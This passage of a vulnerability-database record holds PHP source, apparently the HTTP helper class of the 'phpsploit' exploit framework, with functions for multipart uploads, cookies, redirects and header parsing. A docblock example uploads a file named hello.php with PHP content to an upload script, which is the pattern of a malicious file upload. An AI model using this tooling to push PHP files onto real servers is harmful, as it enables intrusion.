\r\n\t * \r\n\t * $array = array(\r\n\t * frmdt_url => \\\"http://localhost/upload.php\\\",\r\n\t * frmdt_boundary => \\\"123456\\\", # Optional\r\n\t * \\\"email\\\" => \\\"me@u.com\\\",\r\n\t * \\\"varname\\\" => array(\r\n\t * frmdt_type => \\\"image/gif\\\", # Optional\r\n\t * frmdt_transfert => \\\"binary\\\", # Optional\r\n\t * frmdt_filename => \\\"hello.php\\\",\r\n\t * frmdt_content => \\\"<?php echo \\':)\\'; ?>\\\"));\r\n\t * $this->formdata($array);\r\n\t *\r\n\t * @param array $array\r\n\t * @return $server_response\r\n\t */\r\n\tpublic function formdata($array)\r\n\t{\r\n\t\t$this->target($array[frmdt_url]);\r\n\t\t$this->method=\\\"formdata\\\";\r\n\t\t$this->data=\\'\\';\r\n\t\tif(!isset($array[frmdt_boundary])) $this->boundary=\\\"phpsploit\\\";\r\n\t\telse $this->boundary=$array[frmdt_boundary];\r\n\t\tforeach($array as $key => $value)\r\n\t\t{\r\n\t\t\tif(!preg_match(\\\"#^frmdt_(boundary|url)#\\\",$key))\r\n\t\t\t{\r\n\t\t\t\t$this->data .= \\\"-----------------------------\\\".$this->boundary.\\\"\r\n\\\";\r\n\t\t\t\t$this->data .= \\\"Content-Disposition: form-data; name=\\\"\\\".$key.\\\"\\\";\\\";\r\n\t\t\t\tif(!is_array($value))\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->data .= \\\"\r\n\r\n\\\".$value.\\\"\r\n\\\";\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->data .= \\\" filename=\\\"\\\".$array[$key][frmdt_filename].\\\"\\\";\r\n\\\";\r\n\t\t\t\t\tif(isset($array[$key][frmdt_type])) $this->data .= \\\"Content-Type: \\\".$array[$key][frmdt_type].\\\"\r\n\\\";\r\n\t\t\t\t\tif(isset($array[$key][frmdt_transfert])) $this->data .= \\\"Content-Transfer-Encoding: \\\".$array[$key][frmdt_transfert].\\\"\r\n\\\";\r\n\t\t\t\t\t$this->data .= \\\"\r\n\\\".$array[$key][frmdt_content].\\\"\r\n\\\";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\t$this->data .= \\\"-----------------------------\\\".$this->boundary.\\\"--\r\n\\\";\r\n\t\treturn $this->sock();\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the content of the server 
response\r\n\t * without the headers.\r\n\t * \r\n\t * $this->getcontent($this->get(\\\"http://localhost/\\\"));\r\n\t * or\r\n\t * $this->getcontent();\r\n\t *\r\n\t * @param string $server_response\r\n\t * @return $onlythecontent\r\n\t */\r\n\tpublic function getcontent($code=\\'\\')\r\n\t{\r\n\t\tif(empty($code)) $code = $this->recv;\r\n\t\t$content = explode(\\\"\r\n\\\",$code);\r\n\t\t$onlycode = \\'\\';\r\n\t\tfor($i=1;$i<count($content);$i++)\r\n\t\t{\r\n\t\t\tif(!preg_match(\\\"/^(S*):/\\\",$content[$i])) $ok = 1;\r\n\t\t\tif($ok) $onlycode .= $content[$i].\\\"\r\n\\\";\r\n\t\t}\r\n\t\treturn $onlycode;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the headers of the server response\r\n\t * without the content.\r\n\t * \r\n\t * $this->getheader($this->post(\\\"http://localhost/x.php\\\",\\\"x=1&z=2\\\"));\r\n\t * or\r\n\t * $this->getheader();\r\n\t *\r\n\t * @param string $server_response\r\n\t * @return $onlytheheaders\r\n\t */\r\n\tpublic function getheader($code=\\'\\')\r\n\t{\r\n\t\tif(empty($code)) $code = $this->recv;\r\n\t\t$header = explode(\\\"\r\n\\\",$code);\r\n\t\t$onlyheader = $header[0].\\\"\r\n\\\";\r\n\t\tfor($i=1;$i<count($header);$i++)\r\n\t\t{\r\n\t\t\tif(!preg_match(\\\"/^(S*):/\\\",$header[$i])) break;\r\n\t\t\t$onlyheader .= $header[$i].\\\"\r\n\\\";\r\n\t\t}\r\n\t\treturn $onlyheader;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function is called by the cookiejar() function.\r\n\t * It adds the value of the \\\"Set-Cookie\\\" header in the \\\"Cookie\\\"\r\n\t * header for the next request. 
You don\\'t have to call it.\r\n\t * \r\n\t * @param string $server_response\r\n\t */\r\n\tprivate function getcookie($code)\r\n\t{\r\n\t\t$carr = explode(\\\"\r\n\\\",str_replace(\\\"\r\n\\\",\\\"\r\n\\\",$code));\r\n\t\tfor($z=0;$z<count($carr);$z++)\r\n\t\t{\r\n\t\t\tif(preg_match(\\\"/set-cookie: (.*)/i\\\",$carr[$z],$cookarr))\r\n\t\t\t{\r\n\t\t\t\t$cookie[] = preg_replace(\\\"/expires=(.*)(GMT||UTC)(S*)$/i\\\",\\\"\\\",preg_replace(\\\"/path=(.*)/i\\\",\\\"\\\",$cookarr[1]));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tfor($i=0;$i<count($cookie);$i++)\r\n\t\t{\r\n\t\t\tpreg_match(\\\"/(S*)=(S*)(|;)/\\\",$cookie[$i],$matches);\r\n\t \t $cookn = $matches[1];\r\n\t \t $cookv = $matches[2];\r\n\t \t $this->addcookie($cookn,$cookv);\r\n\t\t}\r\n }\r\n\r\n\t\r\n\t/**\r\n\t * This function is called by the get()/post() functions.\r\n\t * You don\\'t have to call it.\r\n\t *\r\n\t * @param string $urltarg\r\n\t */\r\n\tprivate function target($urltarg)\r\n\t{\r\n\t\tif(!preg_match(\\\"/^http://(.*)//\\\",$urltarg)) $urltarg .= \\\"/\\\";\r\n\t\t$this->url=$urltarg;\r\n\t\t\r\n\t\t$array = explode(\\\"/\\\",str_replace(\\\"http://\\\",\\\"\\\",preg_replace(\\\"/:(d+)/\\\",\\\"\\\",$urltarg)));\r\n\t\t$this->host=$array[0];\r\n\r\n\t\tpreg_match(\\\"/:(d+)//\\\",$urltarg,$matches);\r\n\t\t$this->port=empty($matches[1]) ? 
80 : $matches[1];\r\n\t\t\r\n\t\t$temp = str_replace(\\\"http://\\\",\\\"\\\",preg_replace(\\\"/:(d+)/\\\",\\\"\\\",$urltarg));\r\n\t\tpreg_match(\\\"//(.*)//\\\",$temp,$matches);\r\n\t\t$this->path=str_replace(\\\"//\\\",\\\"/\\\",\\\"/\\\".$matches[1].\\\"/\\\");\r\n\t\r\n\t\tif($this->port > 65535) die(\\\"Error: Invalid port number\\\");\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * If you call this function, the script will\r\n\t * extract all \\\"Set-Cookie\\\" headers values\r\n\t * and it will automatically add them into the \\\"Cookie\\\" header\r\n\t * for all next requests.\r\n\t *\r\n\t * $this->cookiejar(1); // enabled\r\n\t * $this->cookiejar(0); // disabled\r\n\t * \r\n\t */\r\n\tpublic function cookiejar($code)\r\n\t{\r\n\t\tif($code===0) $this->cookiejar=\\'\\';\r\n\t\tif($code===1) $this->cookiejar=1;\r\n\t\telse\r\n\t\t{\r\n\t\t\t$this->getcookie($code);\r\n\t\t}\r\n\t}\r\n\r\n\r\n\t/**\r\n\t * If you call this function, the script will\r\n\t * follow all redirections sent by the server.\r\n\t * \r\n\t * $this->allowredirection(1); // enabled\r\n\t * $this->allowredirection(0); // disabled\r\n\t * \r\n\t * @return $this->get($locationresponse)\r\n\t */\r\n\tpublic function allowredirection($code)\r\n\t{\r\n\t\tif($code===0) $this->allowredirection=\\'\\';\r\n\t\tif($code===1) $this->allowredirection=1;\r\n\t\telse\r\n\t\t{\r\n\t\t\tif(preg_match(\\\"/(location|content-location|uri): (.*)/i\\\",$code,$codearr))\r\n\t\t\t{\r\n\t\t\t\t$location = str_replace(chr(13),\\'\\',$codearr[2]);\r\n\t\t\t\tif(!eregi(\\\"://\\\",$location))\r\n\t\t\t\t{\r\n\t\t\t\t\treturn $this->get(\\\"http://\\\".$this->host.$this->path.$location);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\treturn $this->get($location);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\treturn $code;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function allows you to reset some parameters:\r\n\t * \r\n\t * $this->reset(header); // headers cleaned\r\n\t * 
$this->reset(cookie); // cookies cleaned\r\n\t * $this->reset(); // clean all parameters\r\n\t *\r\n\t * @param string $func\r\n\t */\r\n\tpublic function reset($func=\\'\\')\r\n\t{\r\n\t\tswitch($func)\r\n\t\t{\r\n\t\t\tcase \\\"header\\\":\r\n\t\t\t$this->header=\\'\\';\r\n\t\t\tbreak;\r\n\t\t\t\r\n\t\t\tcase \\\"cookie\\\":\r\n\t\t\t$this->cookie=\\'\\';\r\n\t\t\tbreak;\r\n\t\t\t\r\n\t\t\tdefault:\r\n\t\t $this->cookiejar=\\'\\';\r\n\t\t $this->header=\\'\\';\r\n\t\t $this->cookie=\\'\\';\r\n\t\t $this->allowredirection=\\'\\'; \r\n\t\t $this->agent=\\'\\';\r\n\t\t break;\r\n\t\t}\r\n\t}\r\n}\r\n?>\r\n\r\n \n ", "id": "SSV:6248", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:09:18", "reporter": "Root", "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645442255, "score": 1659785532, "epss": 1678851499}}
{}